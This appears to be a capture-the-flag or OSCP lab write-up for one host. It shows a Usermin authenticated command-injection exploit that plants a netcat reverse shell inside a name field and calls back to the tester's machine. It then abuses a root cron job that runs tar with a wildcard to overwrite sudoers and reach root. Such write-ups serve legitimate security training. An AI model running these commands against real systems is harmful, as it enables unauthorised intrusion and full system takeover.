---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Usermin 1.750 - Remote Command Execution (Metasploit) | linux/webapps/46468.rb
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) | linux/webapps/50234.py
Usermin 2.100 - Username Enumeration | multiple/webapps/52254.py
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin Usermin 2.100 - Username Enumeration | perl/webapps/52114.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------Downloaded POC
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit -m 50234
Exploit: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50234
Path: /usr/share/exploitdb/exploits/linux/webapps/50234.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/oscp/157/userminrce/50234.pyExecuted POC after updating the listen_ip
┌──(kali🎃kali)-[~/oscp/157]
└─$ python 50234.py --host 192.168.135.157 --login cassie --password cassie
/home/kali/oscp/157/50234.py:82: SyntaxWarning: invalid escape sequence '\?'
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
[+] Target https://192.168.135.157:20000
[+] Login successfully
[+] Setup GnuPG
[+] Payload {'name': '";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.199 1337 >/tmp/f;echo "', 'email': '1337@webmin.com'}
[+] Setup successful
[+] Fetching key list
[+] Key : idx=3\
Traceback (most recent call last):Successfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp/157]
└─$ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.157] 41580
sh: cannot set terminal process group (1019): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1$Read local.txt
sh-5.1$ cat local.txt
cat local.txt
52ceea799729705181436ea3b8f0fabb
sh-5.1$ ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 274061 bytes 24052097 (24.0 MB)
RX errors 0 dropped 1178 overruns 0 frame 0
TX packets 315997 bytes 53660451 (53.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 3760 bytes 270530 (270.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3760 bytes 270530 (270.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Privilege Escalation
Performed linux-smart-enumeration and found that tar command is using wildcards
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/cron.d/2minutes:*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *Created file for Tar command Wildcard Privilege Escalation
cassie@oscp:/opt/admin$ echo "" > '--checkpoint=1'
cassie@oscp:/opt/admin$ echo "" > '--checkpoint-action=exec=sh shell.sh'
cassie@oscp:/opt/admin$ echo "echo 'cassie ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh
cassie@oscp:/opt/admin$ ls -l
total 12
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:48 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:47 --checkpoint=1
-rw-r--r-- 1 cassie cassie 54 Dec 26 17:51 shell.shAfter a brief wait, the scheduled tar command executed and modified sudoers file. After that successfully escalated to root using passwordless sudo
User cassie may run the following commands on oscp:
(root) NOPASSWD: ALL
cassie@oscp:/opt/admin$ sudo su -
sudo su -
root@oscp:~#Read proof.txt
cat /root/proof.txt
ce856bfe9c26dadac2a32898adf525cd
root@oscp:~# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 278529 bytes 25437073 (25.4 MB)
RX errors 0 dropped 1374 overruns 0 frame 0
TX packets 318780 bytes 54844065 (54.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4892 bytes 350922 (350.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4892 bytes 350922 (350.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0